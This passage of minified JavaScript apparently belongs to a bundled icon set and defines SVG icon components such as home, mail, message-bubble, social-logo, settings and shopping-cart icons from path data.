1-.277-1.25l11.5-11.082.057-.05a.753.753 0 0 1 .493-.16Z",clipRule:"evenodd"})),home_house_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M21.75 19A2.75 2.75 0 0 1 19 21.75h-3.5A1.75 1.75 0 0 1 13.75 20v-5a.25.25 0 0 0-.25-.25h-3a.25.25 0 0 0-.25.25v5a1.75 1.75 0 0 1-1.75 1.75H5A2.75 2.75 0 0 1 2.25 19v-8.1c0-.786.336-1.534.923-2.056l7-6.223a2.75 2.75 0 0 1 3.654 0l7 6.223a2.75 2.75 0 0 1 .923 2.056V19Z"})),hourglass_timer_time_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M20 1.25a.75.75 0 0 1 0 1.5h-1.25v4.18c0 .92-.46 1.778-1.225 2.288L13.352 12l4.173 2.782a2.75 2.75 0 0 1 1.225 2.288v4.18H20a.75.75 0 0 1 0 1.5H4a.75.75 0 0 1 0-1.5h1.25v-4.18c0-.92.46-1.778 1.225-2.288L10.648 12 6.475 9.218A2.75 2.75 0 0 1 5.25 6.93V2.75H4a.75.75 0 0 1 0-1.5h16ZM13.75 16.5a.75.75 0 0 0-.75-.75h-2a.75.75 0 0 0 0 1.5h2a.75.75 0 0 0 .75-.75Zm.75 2.25a.75.75 0 0 1 0 1.5h-5a.75.75 0 0 1 0-1.5h5Z",clipRule:"evenodd"})),instagram_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M9 12a3 3 0 1 1 6 0 3 3 0 0 1-6 0Z"}),(0,a.createElement)("path",{fillRule:"evenodd",d:"M5 2.25A2.75 2.75 0 0 0 2.25 5v14A2.75 2.75 0 0 0 5 21.75h14A2.75 2.75 0 0 0 21.75 19V5A2.75 2.75 0 0 0 19 2.25H5Zm12.5 5.5a1.25 1.25 0 1 0 0-2.5 1.25 1.25 0 0 0 0 2.5ZM12 7a5 5 0 1 0 0 10 5 5 0 0 0 0-10Z",clipRule:"evenodd"})),laptop_computer_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M2.75 15.25V6A2.75 2.75 0 0 1 5.5 3.25h13A2.75 2.75 0 0 1 21.25 6v9.25H2.75ZM13.5 6a1 1 0 1 1 0 2h-3a1 1 0 1 1 0-2h3ZM1.25 18v-1.25h21.5V18A2.75 2.75 0 0 1 20 20.75H4A2.75 2.75 0 0 1 1.25 18Z",clipRule:"evenodd"})),left_align_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M21 2a1 1 0 1 1 0 2H3a1 1 0 0 1 0-2h18ZM11 20a1 1 0 1 1 0 2H3a1 1 0 1 1 0-2h8Zm10-6a1 1 0 1 1 0 2H3a1 1 0 1 1 0-2h18ZM11 8a1 1 0 1 1 0 2H3a1 1 0 0 1 0-2h8Z"})),left_triangle_angle_arrow_backward_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M17.75 19c0 1.442-1.646 2.265-2.8 1.4l-9.333-7a1.75 1.75 0 0 1 0-2.8l9.333-7c1.154-.865 2.8-.042 2.8 1.4v14Z"})),linkedin_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M5 2.25A2.75 2.75 0 0 0 2.25 5v14A2.75 2.75 0 0 0 5 21.75h14A2.75 2.75 0 0 0 21.75 19V5A2.75 2.75 0 0 0 19 2.25H5Zm11.15 16.792h2.893v-5.945c0-2.515-1.425-3.731-3.417-3.731-1.992 0-2.83 1.552-2.83 1.552V9.652h-2.79v9.389h2.79v-4.929c0-1.32.607-2.106 1.77-2.106 1.07 0 1.584.755 1.584 2.106v4.929ZM4.96 6.69c0 .957.77 1.732 1.72 1.732s1.719-.775 1.719-1.732-.77-1.733-1.72-1.733S4.96 5.733 4.96 6.69Zm3.188 12.35H5.24V9.654h2.908v9.389Z",clipRule:"evenodd"})),link_chains_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M6.264 9.281a1 1 0 0 1 1.415 1.415L5.165 13.21a3.977 3.977 0 1 0 5.625 5.625l2.514-2.514a1 1 0 0 1 1.415 1.414l-2.515 2.514a5.977 5.977 0 1 1-8.453-8.453L6.264 9.28Zm5.532-5.53a5.977 5.977 0 1 1 8.453 8.453l-2.514 2.515a1 1 0 0 1-1.414-1.415l2.514-2.514a3.977 3.977 0 1 0-5.625-5.625l-2.514 2.514a1.001 1.001 0 0 1-1.415-1.414l2.515-2.514Z"}),(0,a.createElement)("path",{d:"M13.793 8.793a1 1 0 1 1 1.414 1.414l-5 5a1 1 0 0 1-1.414-1.414l5-5Z"})),location_gps_map_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M11.625 22.65 12 22l.375.65a.75.75 0 0 1-.75 0Z"}),(0,a.createElement)("path",{fillRule:"evenodd",d:"M11.625 22.65 12 22c.375.65.376.649.376.649l.002-.001.006-.004.02-.012.034-.02.04-.024a19.765 19.765 0 0 0 1.212-.814 22.44 22.44 0 0 0 2.847-2.456c2.058-2.11 4.213-5.239 4.213-9.113 0-4.928-3.9-8.955-8.75-8.955s-8.75 4.027-8.75 8.955c0 3.874 2.155 7.002 4.213 9.113a22.436 22.436 0 0 0 3.788 3.101 12.961 12.961 0 0 0 .344.213l.021.012.006.004.003.001ZM12 6.25a3.75 3.75 0 1 0 0 7.5 3.75 3.75 0 0 0 0-7.5Z",clipRule:"evenodd"})),long_arrow_up_top_increase_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M11 21V10H6a1 1 0 0 1-.707-1.707l6-6 .076-.068a1 1 0 0 1 1.338.068l6 6A1 1 0 0 1 18 10h-5v11a1 1 0 1 1-2 0Z"})),mail_email_messege_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M4 3.25A2.75 2.75 0 0 0 1.25 6v12A2.75 2.75 0 0 0 4 20.75h16A2.75 2.75 0 0 0 22.75 18V6A2.75 2.75 0 0 0 20 3.25H4ZM6.6 7.2a1 1 0 1 0-1.2 1.6l4.8 3.6a3 3 0 0 0 3.6 0l4.8-3.6a1 1 0 0 0-1.2-1.6l-4.8 3.6a1 1 0 0 1-1.2 0L6.6 7.2Z",clipRule:"evenodd"})),media_document_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M2.25 19V5A2.75 2.75 0 0 1 5 2.25h10.172c.73 0 1.429.29 1.944.806l3.828 3.828a2.75 2.75 0 0 1 .806 1.944V19A2.75 2.75 0 0 1 19 21.75H5A2.75 2.75 0 0 1 2.25 19ZM15 15.5a1 1 0 0 0-1-1H8a1 1 0 1 0 0 2h6a1 1 0 0 0 1-1Zm-2-7a1 1 0 0 0-1-1H8a1 1 0 0 0 0 2h4a1 1 0 0 0 1-1Zm4 3.5a1 1 0 0 0-1-1H8a1 1 0 1 0 0 2h8a1 1 0 0 0 1-1Z"})),messege_comment_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M22.75 16A2.75 2.75 0 0 1 20 18.75H7.264l-4.795 3.836A.75.75 0 0 1 1.25 22V7A2.75 2.75 0 0 1 4 4.25h16A2.75 2.75 0 0 1 22.75 7v9ZM14 9.75a1 1 0 0 0-1-1H9a1 1 0 1 0 0 2h4a1 1 0 0 0 1-1Zm1 2.5a1 1 0 1 1 0 2H9a1 1 0 1 1 0-2h6Z",clipRule:"evenodd"})),messege_comment_2_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M22.75 15A2.75 2.75 0 0 1 20 17.75h-6.236l-4.795 3.836A.75.75 0 0 1 7.75 21v-3.25H4A2.75 2.75 0 0 1 1.25 15V6A2.75 2.75 0 0 1 4 3.25h16A2.75 2.75 0 0 1 22.75 6v9ZM14 8.75a1 1 0 0 0-1-1H9a1 1 0 1 0 0 2h4a1 1 0 0 0 1-1Zm1 2.5a1 1 0 1 1 0 2H9a1 1 0 1 1 0-2h6Z",clipRule:"evenodd"})),messege_comment_3_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M4 3.25A2.75 2.75 0 0 0 1.25 6v9A2.75 2.75 0 0 0 4 17.75h3.75V21a.75.75 0 0 0 1.219.586l4.794-3.836H20A2.75 2.75 0 0 0 22.75 15V6A2.75 2.75 0 0 0 20 3.25H4ZM9 10a1 1 0 0 0-2 0v1a1 1 0 1 0 2 0v-1Zm3-1a1 1 0 0 1 1 1v1a1 1 0 1 1-2 0v-1a1 1 0 0 1 1-1Zm5 1a1 1 0 1 0-2 0v1a1 1 0 1 0 2 0v-1Z",clipRule:"evenodd"})),messege_comment_4_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M22.75 15A2.75 2.75 0 0 1 20 17.75h-6.236l-4.795 3.836A.75.75 0 0 1 7.75 21v-3.25H4A2.75 2.75 0 0 1 1.25 15V6A2.75 2.75 0 0 1 4 3.25h16A2.75 2.75 0 0 1 22.75 6v9Z"})),messege_comment_5_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M21.75 12A9.75 9.75 0 0 1 12 21.75H3a.75.75 0 0 1-.75-.75v-9c0-5.385 4.365-9.75 9.75-9.75s9.75 4.365 9.75 9.75ZM16 10.25a1 1 0 0 0-1-1H9a1 1 0 1 0 0 2h6a1 1 0 0 0 1-1Zm-1 2.5a1 1 0 1 1 0 2H9a1 1 0 1 1 0-2h6Z",clipRule:"evenodd"})),messege_comment_6_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M17 3.25A5.75 5.75 0 0 1 22.75 9v7a.75.75 0 0 1-.75.75h-5.31a4.75 4.75 0 0 1-4.69 4H2a.75.75 0 0 1-.75-.75v-6a4.751 4.751 0 0 1 4-4.691V9A5.75 5.75 0 0 1 11 3.25h6ZM5.25 10.838A3.25 3.25 0 0 0 2.75 14v5.25H12a3.25 3.25 0 0 0 3.162-2.5H11A5.75 5.75 0 0 1 5.25 11v-.162ZM11 10.75a1 1 0 1 0 0 2h6a1 1 0 1 0 0-2h-6Zm0-3.5a1 1 0 1 0 0 2h4a1 1 0 1 0 0-2h-4Z",clipRule:"evenodd"})),messege_comment_7_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M22.75 11.5c0 5.218-4.932 9.25-10.75 9.25-.921 0-1.817-.101-2.672-.29l-2.956 1.691A.75.75 0 0 1 5.25 21.5v-2.8c-2.411-1.675-4-4.258-4-7.2 0-5.218 4.932-9.25 10.75-9.25s10.75 4.032 10.75 9.25ZM16 10.25a1 1 0 0 0-1-1H9a1 1 0 1 0 0 2h6a1 1 0 0 0 1-1Zm-2 2.5a1 1 0 1 1 0 2h-4a1 1 0 1 1 0-2h4Z",clipRule:"evenodd"})),messege_comment_8_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M14.5 3.25c4.542 0 8.25 3.613 8.25 8.102 0 2.519-1.172 4.764-3 6.247V20a.75.75 0 0 1-1.163.626l-2.13-1.404a8.41 8.41 0 0 1-1.957.231 8.323 8.323 0 0 1-4.61-1.382 7.867 7.867 0 0 1-3.075-.06l-1.82 1.127A.75.75 0 0 1 3.85 18.5v-1.87c-1.576-1.222-2.6-3.07-2.6-5.157C1.25 7.7 4.557 4.75 8.5 4.75c.319 0 .634.02.942.057a.755.755 0 0 1 .15.033A8.318 8.318 0 0 1 14.5 3.25ZM8.08 6.265c-3.03.195-5.33 2.505-5.33 5.208 0 1.68.878 3.196 2.276 4.162a.75.75 0 0 1 .324.617v.903l.943-.583a.75.75 0 0 1 .587-.086c.45.12.925.188 1.416.203A7.98 7.98 0 0 1 8.08 6.265Z",clipRule:"evenodd"})),messenger_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M1.25 11.677C1.25 5.687 5.945 1.25 12 1.25s10.75 4.44 10.75 10.43c0 5.99-4.695 10.427-10.75 10.427a11.75 11.75 0 0 1-3.112-.414.864.864 0 0 0-.575.043l-2.134.94a.86.86 0 0 1-1.207-.76l-.059-1.913a.85.85 0 0 0-.288-.613c-2.09-1.87-3.375-4.58-3.375-7.713Zm7.452-1.959-3.157 5.01c-.304.48.287 1.02.739.677l3.391-2.575a.644.644 0 0 1 .777-.003l2.513 1.884a1.612 1.612 0 0 0 2.332-.43l3.161-5.006c.301-.481-.29-1.024-.742-.68l-3.391 2.574a.644.644 0 0 1-.777.003l-2.513-1.884a1.613 1.613 0 0 0-2.333.43Z",clipRule:"evenodd"})),microsoft_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M11.25 2.25v9h-9V5A2.75 2.75 0 0 1 5 2.25h6.25Zm1.5 0v9h9V5A2.75 2.75 0 0 0 19 2.25h-6.25Zm9 10.5h-9v9H19A2.75 2.75 0 0 0 21.75 19v-6.25Zm-10.5 9v-9h-9V19A2.75 2.75 0 0 0 5 21.75h6.25Z"})),middle_align_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M21 2a1 1 0 1 1 0 2H3a1 1 0 0 1 0-2h18Zm-5 18a1 1 0 1 1 0 2H8a1 1 0 1 1 0-2h8Zm5-6a1 1 0 1 1 0 2H3a1 1 0 1 1 0-2h18Zm-5-6a1 1 0 1 1 0 2H8a1 1 0 0 1 0-2h8Z"})),mobile_smartphone_phone_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M17 22.75A2.75 2.75 0 0 0 19.75 20V4A2.75 2.75 0 0 0 17 1.25H7A2.75 2.75 0 0 0 4.25 4v16A2.75 2.75 0 0 0 7 22.75h10ZM13.5 4a1 1 0 1 1 0 2h-3a1 1 0 1 1 0-2h3Z",clipRule:"evenodd"})),pause_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M2.25 5A2.75 2.75 0 0 1 5 2.25h2.5A2.75 2.75 0 0 1 10.25 5v14a2.75 2.75 0 0 1-2.75 2.75H5A2.75 2.75 0 0 1 2.25 19V5Zm11.5 0a2.75 2.75 0 0 1 2.75-2.75H19A2.75 2.75 0 0 1 21.75 5v14A2.75 2.75 0 0 1 19 21.75h-2.5A2.75 2.75 0 0 1 13.75 19V5Z",clipRule:"evenodd"})),pinterest_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12c0 4.554 2.833 8.448 6.832 10.014-.094-.85-.178-2.159.038-3.087.195-.84 1.26-5.344 1.26-5.344s-.321-.644-.321-1.596c0-1.495.866-2.61 1.945-2.61.917 0 1.36.688 1.36 1.514 0 .922-.587 2.301-.89 3.579-.254 1.07.536 1.943 1.592 1.943 1.91 0 3.379-2.015 3.379-4.923 0-2.574-1.85-4.374-4.49-4.374-3.06 0-4.855 2.295-4.855 4.665 0 .925.356 1.915.8 2.454.088.106.101.2.075.308-.082.34-.263 1.07-.298 1.22-.047.196-.156.238-.36.143-1.343-.625-2.182-2.588-2.182-4.165 0-3.39 2.464-6.505 7.103-6.505 3.729 0 6.627 2.657 6.627 6.209 0 3.705-2.336 6.686-5.578 6.686-1.09 0-2.114-.566-2.464-1.234 0 0-.54 2.053-.67 2.555-.243.934-.898 2.105-1.336 2.819A10.76 10.76 0 0 0 12 22.75c5.937 0 10.75-4.813 10.75-10.75S17.937 1.25 12 1.25Z"})),play_media_video_circle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 22.75c5.936 0 10.75-4.813 10.75-10.75S17.936 1.25 12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75ZM10.416 7.376A.75.75 0 0 0 9.25 8v8a.75.75 0 0 0 1.166.624l6-4a.75.75 0 0 0 0-1.248l-6-4Z",clipRule:"evenodd"})),price_tag_label_category_sale_discount_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M21.444 13.616a2.75 2.75 0 0 0 .806-1.944V3.5a1.75 1.75 0 0 0-1.75-1.75h-8.172c-.73 0-1.429.29-1.945.806l-8 8a2.75 2.75 0 0 0 0 3.888l7.172 7.172a2.75 2.75 0 0 0 3.889 0l8-8ZM8.707 12.293a1 1 0 1 0-1.414 1.414l3 3 .076.068a1 1 0 0 0 1.406-1.406l-.068-.076-3-3ZM18 7.5a1.5 1.5 0 1 1-3 0 1.5 1.5 0 0 1 3 0Z",clipRule:"evenodd"})),price_tag_offer_sale_coupon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M18.796 6.963c-.367 1.048-1.172 1.993-2.432 2.693a.75.75 0 1 1-.728-1.311c.99-.55 1.517-1.229 1.744-1.878a2.583 2.583 0 0 0-.1-1.941c-.55-1.208-1.999-2.11-3.853-1.618-2.791.74-6.15 1.333-9.695-.024a.75.75 0 1 1 .536-1.401c3.09 1.183 6.062.695 8.774-.025 2.566-.68 4.75.577 5.603 2.445.425.933.517 2.017.151 3.06Z",clipRule:"evenodd"}),(0,a.createElement)("path",{fillRule:"evenodd",d:"M19.74 7.294c-.46 1.313-1.45 2.436-2.89 3.236a1.75 1.75 0 1 1-1.7-3.06c.81-.45 1.152-.95 1.286-1.333a1.59 1.59 0 0 0-.066-1.197 1.835 1.835 0 0 0-.101-.19h-4.44c-.73 0-1.43.29-1.945.805l-6.5 6.5a2.75 2.75 0 0 0 0 3.89l6.171 6.171a2.75 2.75 0 0 0 3.89 0l6.5-6.5a2.75 2.75 0 0 0 .805-1.944V6.5c0-.598-.3-1.127-.759-1.442.083.73.01 1.49-.252 2.236Zm-8.71 5.176a.75.75 0 0 0-1.06 1.06l2 2a.75.75 0 0 0 1.06-1.06l-2-2Zm-2.5 1.5a.75.75 0 0 0-1.06 1.06l3 3a.75.75 0 0 0 1.06-1.06l-3-3Z",clipRule:"evenodd"})),reddit_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M13.875 4.75h2.354a2.751 2.751 0 1 0 0-1.5h-2.354A2.75 2.75 0 0 0 11.125 6v2.028c-1.76.115-3.39.571-4.771 1.281a2.875 2.875 0 1 0-3.964 4.109A5.777 5.777 0 0 0 2 15.5C2 19.642 6.477 23 12 23s10-3.358 10-7.5c0-.722-.136-1.421-.39-2.082a2.875 2.875 0 1 0-3.963-4.109C16.2 8.566 14.48 8.1 12.624 8.014V6c0-.69.56-1.25 1.25-1.25ZM9 14.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm0 2.97a.75.75 0 0 0-1.06 1.06c.954.955 2.57 1.345 4.03 1.345 1.46 0 3.075-.39 4.03-1.345a.75.75 0 0 0-1.06-1.06c-.546.545-1.68.905-2.97.905-1.29 0-2.424-.36-2.97-.905ZM16.5 13a1.5 1.5 0 1 1-3 0 1.5 1.5 0 0 1 3 0Z",clipRule:"evenodd"})),refresh_reset_cycle_loop_infinity_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M3 21v-5a1 1 0 0 1 1-1h5a1 1 0 1 1 0 2H5.756A7.977 7.977 0 0 0 12 20a8 8 0 0 0 8-8 1 1 0 1 1 2 0c0 5.523-4.477 10-10 10a9.967 9.967 0 0 1-7-2.863V21a1 1 0 1 1-2 0Zm-1-9C2 6.477 6.477 2 12 2a9.966 9.966 0 0 1 7 2.86V3a1 1 0 1 1 2 0v5a1 1 0 0 1-1 1h-5a1 1 0 1 1 0-2h3.245A8 8 0 0 0 4 12a1 1 0 1 1-2 0Z"})),restriction_no_stop_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM6.383 19.03A9 9 0 0 0 19.03 6.383L6.383 19.03ZM12 3a9 9 0 0 0-7.031 14.616L17.616 4.97A8.96 8.96 0 0 0 12 3Z",clipRule:"evenodd"})),right_align_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M21 2a1 1 0 1 1 0 2H3a1 1 0 0 1 0-2h18Zm0 18a1 1 0 1 1 0 2h-8a1 1 0 1 1 0-2h8Zm0-6a1 1 0 1 1 0 2H3a1 1 0 1 1 0-2h18Zm0-6a1 1 0 1 1 0 2h-8a1 1 0 1 1 0-2h8Z"})),right_triangle_angle_play_arrow_forward_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M6.25 5c0-1.442 1.646-2.265 2.8-1.4l9.334 7c.933.7.933 2.1 0 2.8l-9.334 7c-1.154.865-2.8.042-2.8-1.4V5Z"})),search_magnify_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M16.618 18.032a9 9 0 1 1 1.414-1.414l3.675 3.675a1 1 0 0 1-1.414 1.414l-3.675-3.675ZM4 11a7 7 0 1 1 12.042 4.856 1.006 1.006 0 0 0-.186.186A7 7 0 0 1 4 11Z",clipRule:"evenodd"}),(0,a.createElement)("path",{fillRule:"evenodd",d:"M10 6.5a1 1 0 0 1 1-1 5.5 5.5 0 0 1 5.5 5.5 1 1 0 1 1-2 0A3.5 3.5 0 0 0 11 7.5a1 1 0 0 1-1-1Z",clipRule:"evenodd"})),settings_tool_function_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M15.183 2.612a1.75 1.75 0 0 0-1.706-1.362h-2.953a1.75 1.75 0 0 0-1.706 1.362l-.355 1.562a1.25 1.25 0 0 1-1.587.918L5.25 4.59a1.75 1.75 0 0 0-2.021.782L1.772 7.837a1.75 1.75 0 0 0 .338 2.193l1.16 1.04a1.25 1.25 0 0 1 0 1.862L2.11 13.97a1.75 1.75 0 0 0-.337 2.193l1.455 2.464a1.751 1.751 0 0 0 2.021.783l1.628-.5a1.25 1.25 0 0 1 1.586.917l.355 1.56a1.75 1.75 0 0 0 1.707 1.363h2.952a1.75 1.75 0 0 0 1.706-1.362l.355-1.56a1.25 1.25 0 0 1 1.586-.919l1.628.501a1.75 1.75 0 0 0 2.02-.783l1.457-2.464a1.75 1.75 0 0 0-.34-2.193l-1.157-1.038a1.25 1.25 0 0 1 0-1.863l1.159-1.039a1.75 1.75 0 0 0 .338-2.193l-1.456-2.464a1.75 1.75 0 0 0-2.02-.782l-1.629.5a1.25 1.25 0 0 1-1.586-.917l-.355-1.562ZM15 12a3 3 0 1 1-6 0 3 3 0 0 1 6 0Z",clipRule:"evenodd"})),share_social_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"m9.075 9.42 5.865-2.933a3.45 3.45 0 1 1 1.005 1.734l-5.976 2.988a3.915 3.915 0 0 1 0 1.583l5.976 2.987a3.45 3.45 0 1 1-1.005 1.734L9.074 14.58a3.9 3.9 0 1 1 0-5.16Z",clipRule:"evenodd"})),shopping_cart_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M9.75 19.25a1 1 0 1 0-2 0 1 1 0 0 0 2 0Zm9.75 0a1 1 0 1 0-2 0 1 1 0 0 0 2 0Zm1.5 0a2.5 2.5 0 1 1-4.79-1h-5.17a2.5 2.5 0 1 1-4.33-.442 1.745 1.745 0 0 1-.572-1.069L4.376 3.966a.25.25 0 0 0-.247-.216H2a.75.75 0 0 1 0-1.5h2.129a1.75 1.75 0 0 1 1.733 1.51l.068.49h14.874a1.75 1.75 0 0 1 1.722 2.06l-1.152 6.403a1.75 1.75 0 0 1-1.572 1.434l-12.36 1.067.182 1.32a.25.25 0 0 0 .247.216H18.5a2.5 2.5 0 0 1 2.5 2.5Z"})),skype_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M7.5 1.25a6.25 6.25 0 0 0-5.197 9.723 9.75 9.75 0 0 0 10.724 10.724 6.25 6.25 0 0 0 8.67-8.67A9.75 9.75 0 0 0 10.973 2.303 6.224 6.224 0 0 0 7.5 1.25Zm4.5 6C9.8 7.25 8.25 8.4 8.25 10c0 1.015.647 1.627 1.337 1.991.644.34 1.468.546 2.178.723l.053.014c.778.194 1.429.361 1.894.607.435.23.538.43.538.665 0 .4-.45 1.25-2.25 1.25S9.75 14.4 9.75 14a.75.75 0 0 0-1.5 0c0 1.6 1.55 2.75 3.75 2.75s3.75-1.15 3.75-2.75c0-1.015-.647-1.627-1.337-1.991-.644-.34-1.468-.546-2.178-.723l-.053-.014c-.778-.194-1.429-.361-1.894-.607-.435-.23-.538-.43-.538-.665 0-.4.45-1.25 2.25-1.25s2.25.85 2.25 1.25a.75.75 0 0 0 1.5 0c0-1.6-1.55-2.75-3.75-2.75Z",clipRule:"evenodd"})),smile_emoji_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25ZM8.5 7.5a1 1 0 0 1 1 1V10a1 1 0 1 1-2 0V8.5a1 1 0 0 1 1-1Zm7 0a1 1 0 0 1 1 1V10a1 1 0 1 1-2 0V8.5a1 1 0 0 1 1-1Zm-7.556 6.275a.75.75 0 1 0-1.43.45 5.752 5.752 0 0 0 10.973 0 .75.75 0 1 0-1.431-.45 4.252 4.252 0 0 1-8.112 0Z",clipRule:"evenodd"})),social_community_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.75a3.384 3.384 0 0 1 3.238 2.408C18.858 5.46 21.4 8.895 21.4 13c0 .506-.039 1.002-.113 1.486a3.388 3.388 0 0 1 1.463 2.791 3.386 3.386 0 0 1-4.785 3.085A9.3 9.3 0 0 1 12 22.5a9.302 9.302 0 0 1-5.965-2.138 3.386 3.386 0 0 1-4.785-3.085c0-1.156.579-2.179 1.463-2.79A9.77 9.77 0 0 1 2.6 13c0-4.105 2.543-7.54 6.162-8.841A3.384 3.384 0 0 1 12 1.75ZM19.4 13c0-2.998-1.707-5.533-4.22-6.704A3.383 3.383 0 0 1 12 